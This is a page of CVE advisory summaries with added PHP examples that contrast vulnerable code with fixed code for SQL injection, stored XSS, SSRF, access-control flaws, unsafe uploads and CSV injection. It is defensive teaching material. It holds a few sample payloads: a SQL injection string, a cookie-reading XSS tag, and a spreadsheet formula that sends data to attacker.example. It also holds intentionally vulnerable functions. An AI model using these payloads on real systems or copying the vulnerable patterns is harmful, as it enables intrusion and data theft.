• Cybersecurity Vulnerabilities

    CVE-2025-13349: XSS Vulnerability Plagues Student Grades Management System

    Overview
    CVE-2025-13349 is a stored Cross-Site Scripting (XSS) vulnerability in SourceCodester Student Grades Management System version 1.0. The “Remarks” field on the “Add New Grade Page” (/grades.php) accepts arbitrary input, and because the value is stored and later rendered without escaping, JavaScript placed in it runs in the browser of every user who views the affected grade record. The flaw is rated low severity, but a stored payload can still be used for session or account compromise, data theft, or defacement of the application. It is remotely exploitable and a public exploit is already available.

    Technical Details
    The vulnerability resides in /grades.php, in the handling of the “Remarks” input when a new grade is added. The application fails to properly sanitize…

  • Cybersecurity Vulnerabilities

    CVE-2025-13347: Critical SQL Injection Flaw in SourceCodester Train Station Ticketing System 1.0

    Overview
    CVE-2025-13347 describes a SQL injection vulnerability in SourceCodester Train Station Ticketing System version 1.0. A remote attacker can inject SQL through the ‘Username’ parameter of the /ajax.php?action=save_user endpoint (the save-user action) and so run attacker-chosen statements against the application’s database.

    Technical Details
    The ‘Username’ parameter reaches the database query in /ajax.php?action=save_user without validation or parameterization, so SQL placed in it becomes part of the executed statement. This allows an attacker to:
      - Bypass authentication
      - Extract sensitive data (user credentials,…

  • Cybersecurity Vulnerabilities

    Critical Alert: SQL Injection Vulnerability Discovered in SourceCodester Train Station Ticketing System 1.0 (CVE-2025-13346)

    Overview
    CVE-2025-13346 details a SQL injection vulnerability in SourceCodester Train Station Ticketing System version 1.0. A remote attacker can execute arbitrary SQL commands by manipulating specific input parameters, which can lead to unauthorized access to sensitive data, modification of the database, or complete system compromise. The vulnerability is rated MEDIUM severity and is publicly known and potentially exploitable.

    Technical Details
    The injection point is the /ajax.php?action=save_station action, where the id and station arguments are vulnerable. Neither value is validated or parameterized before it reaches the query, so by placing SQL fragments in these parameters an attacker can sidestep whatever input handling exists and inject code…
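The two Train Station Ticketing System findings above (save_user and save_station) share one root cause: request values are spliced into SQL text. The PHP below is an added illustration written for this listing, not SourceCodester's code; the table names (tbl_users, tbl_stations) and columns are assumptions. It shows a vulnerable query builder next to handlers that bind every request value with a prepared statement.

```php
<?php
// Added illustration for this listing page; this is not code from the
// SourceCodester Train Station Ticketing System. Table and column names
// (tbl_users, tbl_stations, username, type, station) are assumptions.

// VULNERABLE PATTERN: request values are spliced into the SQL text, so a
// username such as   x', type='admin' WHERE id=1 #   rewrites the statement
// (the MySQL '#' comment discards the application's own WHERE clause).
function build_save_user_sql_vulnerable(array $post): string
{
    $username = $post['username'] ?? '';
    $id       = $post['id'] ?? 0;
    return "UPDATE tbl_users SET username = '$username' WHERE id = $id";
}

// FIXED PATTERN: the statement text is constant and every request value is
// bound as a parameter, so it can only ever be treated as data. Validation
// before the query rejects junk early and returns a clean application error
// instead of a database error that might reveal schema details.
function save_user_fixed(mysqli $db, array $post): bool
{
    $username = trim((string) ($post['username'] ?? ''));
    if ($username === '' || strlen($username) > 64
        || !preg_match('/^[A-Za-z0-9_.@-]+$/', $username)) {
        throw new InvalidArgumentException('invalid username');
    }
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('invalid id');
    }
    $stmt = $db->prepare('UPDATE tbl_users SET username = ? WHERE id = ?');
    $stmt->bind_param('si', $username, $id);
    return $stmt->execute();
}

// The save_station action needs the same shape: bind id as an integer and
// the station name as a string; never interpolate either one.
function save_station_fixed(mysqli $db, array $post): bool
{
    $station = trim((string) ($post['station'] ?? ''));
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($station === '' || strlen($station) > 100 || $id === false) {
        throw new InvalidArgumentException('invalid station or id');
    }
    $stmt = $db->prepare('UPDATE tbl_stations SET station = ? WHERE id = ?');
    $stmt->bind_param('si', $station, $id);
    return $stmt->execute();
}

// Constructed hostile request: shows the vulnerable builder producing a
// statement whose WHERE clause the attacker now controls.
$hostile = ['username' => "x', type='admin' WHERE id=1 #", 'id' => 5];
echo build_save_user_sql_vulnerable($hostile), PHP_EOL;
```

The fixed handlers still validate input, but validation is a usability and defence-in-depth measure, not the SQL injection fix; the fix is that the query text never contains request data. Running the script prints the hijacked UPDATE so the effect of the comment marker is visible without a database.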

  • Cybersecurity Vulnerabilities

    Critical WooCommerce Plugin Flaw: CVE-2025-12545 Exposes Sensitive Product Data

    Overview
    CVE-2025-12545 is an information exposure vulnerability in the Pixel Manager for WooCommerce – Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress, affecting all versions up to and including 1.49.2. Unauthenticated attackers can retrieve data about password-protected, private, and draft WooCommerce products, so product details, pricing, and other information intended only for authorized users or administrators can be read by anyone who can reach the site.

    Technical Details
    The vulnerability resides in the ajax_pmw_get_product_ids() function of the plugin. Due to insufficient access control restrictions, this function fails to properly…
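The access-control gap described above is a common WordPress AJAX shape: a handler registered for logged-out callers that queries products regardless of their status. The PHP below is an added illustration for this listing, not the Pixel Manager plugin's code; the action names, function names and response shape are assumptions. It contrasts an over-permissive handler with one that limits anonymous callers to what the storefront already shows and gates the wider query behind a capability and a nonce.

```php
<?php
// Added illustration for this listing; this is not the Pixel Manager plugin's
// code. Action names, function names and the JSON shape are assumptions.

// VULNERABLE SHAPE: reachable without login (wp_ajax_nopriv_) and querying
// every status, so draft, private and password-protected product IDs leak.
add_action('wp_ajax_nopriv_example_get_product_ids', 'example_get_product_ids_vulnerable');
add_action('wp_ajax_example_get_product_ids',        'example_get_product_ids_vulnerable');
function example_get_product_ids_vulnerable(): void
{
    $q = new WP_Query([
        'post_type'      => 'product',
        'post_status'    => ['publish', 'private', 'draft'],
        'posts_per_page' => -1,
        'fields'         => 'ids',
    ]);
    wp_send_json($q->posts);
}

// FIXED SHAPE. Two changes: (1) an anonymous caller only ever sees published,
// non-password-protected products, which the public catalogue shows anyway;
// (2) the wider query is allowed only for a logged-in user who holds the
// WooCommerce read_private_products capability and presents a valid nonce.
add_action('wp_ajax_nopriv_example_get_product_ids_fixed', 'example_get_product_ids_fixed');
add_action('wp_ajax_example_get_product_ids_fixed',        'example_get_product_ids_fixed');
function example_get_product_ids_fixed(): void
{
    $args = [
        'post_type'      => 'product',
        'post_status'    => 'publish',
        'has_password'   => false,   // drop password-protected products
        'posts_per_page' => 200,     // never unbounded for anonymous callers
        'fields'         => 'ids',
        'no_found_rows'  => true,
    ];

    if (is_user_logged_in()
        && current_user_can('read_private_products')
        && check_ajax_referer('example_product_ids', 'nonce', false)) {
        $args['post_status']  = ['publish', 'private', 'draft'];
        $args['has_password'] = null;   // no password filter for privileged callers
    }

    $q = new WP_Query($args);
    wp_send_json_success(array_map('intval', $q->posts));
}
```

The check to make when reviewing a plugin for this class of bug is simple: for every wp_ajax_nopriv_ registration, list what the handler returns and confirm none of it is post data that the front end would refuse to show a logged-out visitor.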

  • Cybersecurity Vulnerabilities

    CVE-2025-12376: Subscriber-Level SSRF Threatens Icon List Block WordPress Plugin Users

    Overview
    CVE-2025-12376 is a Server-Side Request Forgery (SSRF) vulnerability in the Icon List Block – Add Icon-Based Lists with Custom Styles plugin for WordPress, affecting all versions up to and including 1.2.1. An authenticated attacker with Subscriber-level access or higher can make the web server issue requests to arbitrary internal or external locations. Only responses that parse as valid JSON are returned to the attacker, which limits what can be read back directly, but internal services that speak JSON (many REST APIs and admin interfaces) can still be discovered and queried, and any endpoint can be hit by a request that originates from the server’s network position.

    Technical Details
    The vulnerability lies within the fs_api_request function of the plugin. This function, intended for internal API requests,…
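A request helper that accepts a caller-supplied URL is the shape the advisory above describes. The PHP below is an added illustration for this listing, not the Icon List Block plugin's code; the action name, endpoint allowlist and function names are assumptions. It shows the vulnerable helper beside a version in which the caller can only select a key from a fixed allowlist, with WordPress HTTP options that block redirects and unsafe targets, and an AJAX entry point that a Subscriber cannot reach.

```php
<?php
// Added illustration for this listing; this is not the Icon List Block
// plugin's code. The action name, endpoint allowlist and function names are
// assumptions made for the example.

// VULNERABLE SHAPE: fetches whatever URL it is handed. Reached from an AJAX
// action open to any logged-in user, it lets a Subscriber make the server
// request http://127.0.0.1:8080/, an internal hostname, or a cloud metadata
// address, and read back anything that parses as JSON.
function example_api_request_vulnerable(string $url): array
{
    $response = wp_remote_get($url);
    $decoded  = json_decode(wp_remote_retrieve_body($response), true);
    return is_array($decoded) ? $decoded : [];
}

// FIXED SHAPE: the caller picks a key from a fixed allowlist; scheme, host,
// port and path never come from the request. Only query values are
// user-controlled, and add_query_arg() URL-encodes them.
const EXAMPLE_API_ENDPOINTS = [
    'icons'   => 'https://api.example.com/v1/icons',
    'presets' => 'https://api.example.com/v1/presets',
];

function example_api_request_fixed(string $endpoint, array $query = []): array
{
    if (!isset(EXAMPLE_API_ENDPOINTS[$endpoint])) {
        return [];
    }
    $url = add_query_arg($query, EXAMPLE_API_ENDPOINTS[$endpoint]);
    $response = wp_remote_get($url, [
        'timeout'            => 5,
        'redirection'        => 0,    // a 3xx could otherwise bounce the request to an internal host
        'reject_unsafe_urls' => true, // wp_http_validate_url(): rejects loopback/private IPs and unusual ports
    ]);
    if (is_wp_error($response) || wp_remote_retrieve_response_code($response) !== 200) {
        return [];
    }
    $decoded = json_decode(wp_remote_retrieve_body($response), true);
    return is_array($decoded) ? $decoded : [];
}

// The AJAX entry point should not be reachable by a Subscriber at all:
// require an editing capability and a nonce before doing any network I/O.
add_action('wp_ajax_example_icon_api', function (): void {
    if (!current_user_can('edit_posts')
        || !check_ajax_referer('example_icon_api', 'nonce', false)) {
        wp_send_json_error('forbidden', 403);
    }
    $endpoint = sanitize_key($_POST['endpoint'] ?? '');
    $query    = ['q' => sanitize_text_field(wp_unslash($_POST['q'] ?? ''))];
    wp_send_json_success(example_api_request_fixed($endpoint, $query));
});
```

The allowlist is the primary control; reject_unsafe_urls and the redirect limit are defence in depth, since a host the attacker controls can still resolve to an internal address after validation (DNS rebinding). Note also that no wp_ajax_nopriv_ hook is registered, so unauthenticated callers get nothing.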

  • Cybersecurity Vulnerabilities

    CVE-2025-10158: Critical Rsync Vulnerability Exposes Systems to Data Leakage

    Overview
    CVE-2025-10158 describes a medium-severity vulnerability in the rsync file transfer utility. A malicious client acting as the receiver in an rsync transfer can trigger an out-of-bounds read of a heap-based buffer in the rsync process it is talking to, which can return memory contents to the client (the data leakage in the title). The cause is a negative array index in the rsync code that processes data supplied by the client. Exploitation requires at least read access to the remote rsync module being transferred, so the attacker must be a user (authenticated or anonymous-read) of that module.

    Technical Details
    The vulnerability stems from how rsync handles array indexing when processing data during file transfer reception. Specifically, a carefully crafted, malicious rsync client can send…

  • Cybersecurity Vulnerabilities

    CVE-2025-4212: Critical Stored XSS Vulnerability Plagues Checkout Files Upload for WooCommerce

    Overview
    CVE-2025-4212 is a Stored Cross-Site Scripting (XSS) vulnerability in the Checkout Files Upload for WooCommerce plugin for WordPress, affecting versions up to and including 2.2.1. Unauthenticated attackers can upload files that pass as images but contain web script; the script runs in the browser of any user who opens the page on which the uploaded file is displayed, which can lead to account compromise, data theft, or website defacement.

    Technical Details
    The root cause of CVE-2025-4212 lies in the plugin’s failure to properly sanitize user-supplied input during file uploads and…
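An upload handler that trusts the client's claimed type or the file extension, and then serves the file inline from the site's origin, is the failure mode the advisory above describes. The PHP below is an added illustration for this listing, not the Checkout Files Upload plugin's code; the directory layout and function names are assumptions. It sniffs the bytes, requires the file to decode as a raster image (which rejects SVG and HTML-in-disguise), stores it under a server-chosen name, and serves it with headers that stop a browser from treating it as a document.

```php
<?php
// Added illustration for this listing; this is not the Checkout Files Upload
// plugin's code. Directory handling and function names are assumptions.

// Only raster formats: SVG is XML and can carry <script>, so it is never
// accepted as an "image" here.
const EXAMPLE_ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/webp' => 'webp',
];

// Stores an uploaded file and returns its server-chosen name, or throws.
// $tmpPath is the PHP upload temp file ($_FILES['f']['tmp_name']).
function example_store_image_upload(string $tmpPath, string $destDir): string
{
    if (!is_uploaded_file($tmpPath)) {
        throw new RuntimeException('not an uploaded file');
    }
    // 1. Sniff the bytes; $_FILES['type'] and the original extension are
    //    attacker-controlled and ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if (!isset(EXAMPLE_ALLOWED[$mime])) {
        throw new RuntimeException("rejected type: $mime");
    }
    // 2. Independently confirm it decodes as a raster image. HTML with a
    //    forged magic header, or any SVG, fails here.
    if (@getimagesize($tmpPath) === false) {
        throw new RuntimeException('not a decodable raster image');
    }
    // 3. Server-chosen name: no user characters, extension from the sniffed
    //    type, stored in a directory that is not executed or served directly.
    $name = bin2hex(random_bytes(16)) . '.' . EXAMPLE_ALLOWED[$mime];
    if (!move_uploaded_file($tmpPath, rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('store failed');
    }
    return $name;
}

// Serving: fixed Content-Type from the stored extension, no content sniffing,
// delivered as a download, and a CSP that disables script and sandboxes the
// response if a browser does render it.
function example_send_stored_image(string $destDir, string $name): void
{
    if (!preg_match('/^[a-f0-9]{32}\.(jpg|png|gif|webp)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = rtrim($destDir, '/') . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $ext  = pathinfo($name, PATHINFO_EXTENSION);
    $mime = array_search($ext, EXAMPLE_ALLOWED, true);
    header('Content-Type: ' . $mime);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header("Content-Security-Policy: default-src 'none'; sandbox");
    readfile($path);
}
```

A valid GIF or PNG can still contain script bytes in a comment or metadata chunk (the classic GIF89a polyglot); step 2 does not remove those, which is why the serving side matters as much as validation. Served as image/gif with nosniff and an attachment disposition, such a file is never parsed as HTML or JavaScript, so the embedded text is inert.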

  • Cybersecurity Vulnerabilities

    WinPlus v24.11.27 Authentication Bypass: User Impersonation via CVE-2025-41346

    Overview
    CVE-2025-41346 describes a critical authentication bypass in WinPlus v24.11.27, a software application developed by Informática del Este. An attacker can impersonate another user simply by knowing that user’s numerical ID, gaining full access to the victim’s account and therefore to the confidentiality, integrity, and availability of the data held in it.

    Technical Details
    The vulnerability stems from a faulty authorization control in WinPlus v24.11.27. For certain actions the application does not verify who the caller actually is and instead trusts the ‘numerical ID’ supplied in the request as proof of identity. Numerical IDs are low-entropy and usually enumerable, so this amounts to an insecure direct object reference on the user account itself. An attacker can…

  • Cybersecurity Vulnerabilities

    CVE-2025-13196: Critical Stored XSS Found in Element Pack Addons for Elementor

    Overview
    CVE-2025-13196 is a MEDIUM severity Stored Cross-Site Scripting (XSS) vulnerability in the Element Pack Addons for Elementor plugin for WordPress. Authenticated attackers with Contributor-level access or higher can inject JavaScript into website pages through the Open Street Map widget.

    Technical Details
    The vulnerability stems from insufficient input sanitization and output escaping of the marker content parameter of the Open Street Map widget, which is part of the Element Pack Addons for Elementor plugin. An attacker places a script in the marker content field; due to the lack of proper…
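The stored XSS findings in this listing (the grade “Remarks” field in CVE-2025-13349 and the marker content parameter here in CVE-2025-13196) have the same mechanism: a stored string is written into markup without escaping for the context it lands in. The PHP below is an added illustration for this listing, not code from Student Grades Management System or Element Pack Addons for Elementor; function and field names are assumptions. It shows the vulnerable rendering beside context-specific escaping for HTML text, attributes and script data.

```php
<?php
// Added illustration for this listing; not code from Student Grades
// Management System or Element Pack Addons for Elementor. Function and field
// names are assumptions made for the example.

// VULNERABLE SHAPE shared by both advisories: a stored string (a grade's
// "Remarks", a map marker's content) is dropped into markup as-is, so
// whatever was saved becomes part of the page for every viewer.
function render_remarks_vulnerable(string $remarks): string
{
    return "<td>$remarks</td>";
}

// Escaping has to match the context the value lands in, so each context gets
// its own helper and the choice is visible at the call site.
function out_html(string $s): string
{
    // ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE keeps invalid UTF-8
    // from turning the whole output into an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function out_attr(string $s): string
{
    // Same escaping as text content; the caller must still quote the attribute.
    return out_html($s);
}

function out_js(string $s): string
{
    // For a value placed inside a <script> block: JSON-encode it and also
    // hex-escape < > & ' " so a "</script>" inside the data cannot end the block.
    $json = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
                            | JSON_UNESCAPED_UNICODE | JSON_INVALID_UTF8_SUBSTITUTE);
    return $json === false ? '""' : $json;
}

function render_remarks_fixed(string $remarks): string
{
    return '<td>' . out_html($remarks) . '</td>';
}

function render_marker_fixed(string $title, string $content): string
{
    // Title lands in an attribute, content in a script variable the map code
    // reads; each is escaped for its own context.
    return '<div class="marker" data-title="' . out_attr($title) . '">'
         . '<script>var markerContent = ' . out_js($content) . ';</script>'
         . '</div>';
}

// Constructed stored payload of the kind both advisories describe.
$payload = '<img src=x onerror="alert(document.cookie)">';
echo render_remarks_vulnerable($payload), PHP_EOL;
echo render_remarks_fixed($payload), PHP_EOL;
echo render_marker_fixed('Central "Station"', $payload . '</script>'), PHP_EOL;
```

Escaping at output, not sanitizing at input, is the durable fix: the same stored value is often emitted into several contexts, and only the output site knows which one applies. Inside WordPress plugins the equivalents are esc_html(), esc_attr() and wp_json_encode() with the JSON_HEX_* flags.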

  • Cybersecurity Vulnerabilities

    Urgent: CSV Injection Vulnerability Found in Simple User Import Export WordPress Plugin (CVE-2025-13133)

    Overview
    CVE-2025-13133 is a CSV Injection vulnerability in the Simple User Import Export plugin for WordPress, affecting all versions up to and including 1.1.7. Authenticated attackers with Administrator-level access (or higher) can embed formula-style content in exported CSV files. When such a file is downloaded and opened on a workstation with a vulnerable configuration (for example Microsoft Excel with default settings), the embedded content is evaluated as a formula and can compromise that user’s system. Because the attacker must already hold Administrator rights on the site, the risk is to whoever opens the export (another administrator or an analyst), not to the site itself.

    Technical Details…
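The fix for the CSV injection class described above is applied at export time: every field that can start with a formula trigger is neutralized before it is written. The PHP below is an added illustration for this listing, not the Simple User Import Export plugin's code; the column set and sample rows are constructed for the example. It shows a neutralizing function and an export routine that applies it to every cell.

```php
<?php
// Added illustration for this listing; not the Simple User Import Export
// plugin's code. Column names and sample rows are constructed for the example.

// Spreadsheet applications treat a cell starting with = + - @ (and, in some
// versions, a tab or carriage return) as a formula, so text the export writes
// verbatim can become =HYPERLINK(...) or a DDE-style command on the machine
// of whoever opens the file.
function example_csv_neutralize(string $value): string
{
    // Look past leading spaces: some spreadsheets trim them before parsing.
    $lead = ltrim($value, ' ');
    if ($lead === '' || strpos("=+-@\t\r", $lead[0]) === false) {
        return $value;
    }
    // A leading apostrophe makes Excel, LibreOffice and Sheets read the cell
    // as text. fputcsv() below quotes the field, so commas and quotes inside
    // the value cannot break the row either.
    return "'" . $value;
}

// Writes rows to an in-memory stream and returns the CSV text, so the result
// can be inspected without touching the filesystem.
function example_export_users_csv(array $rows): string
{
    $fh = fopen('php://temp', 'r+');
    fputcsv($fh, ['user_login', 'user_email', 'display_name']);
    foreach ($rows as $row) {
        fputcsv($fh, array_map('example_csv_neutralize', array_map('strval', $row)));
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed rows: the second display name is an injection attempt that a
// malicious administrator could have saved into a user profile.
$rows = [
    ['alice',   'alice@example.com',   'Alice'],
    ['mallory', 'mallory@example.com', '=HYPERLINK("http://attacker.example/?"&A1,"click")'],
    ['bob',     'bob@example.com',     '-5 degrees'],
];
echo example_export_users_csv($rows);
```

The trade-off is visible in the third row: a legitimate value such as "-5 degrees" or a phone number written "+44 ..." also receives the apostrophe. For an export intended for human review that is acceptable; for a machine-to-machine feed, prefer a format without formula semantics (JSON) over trying to be clever about which leading characters are safe.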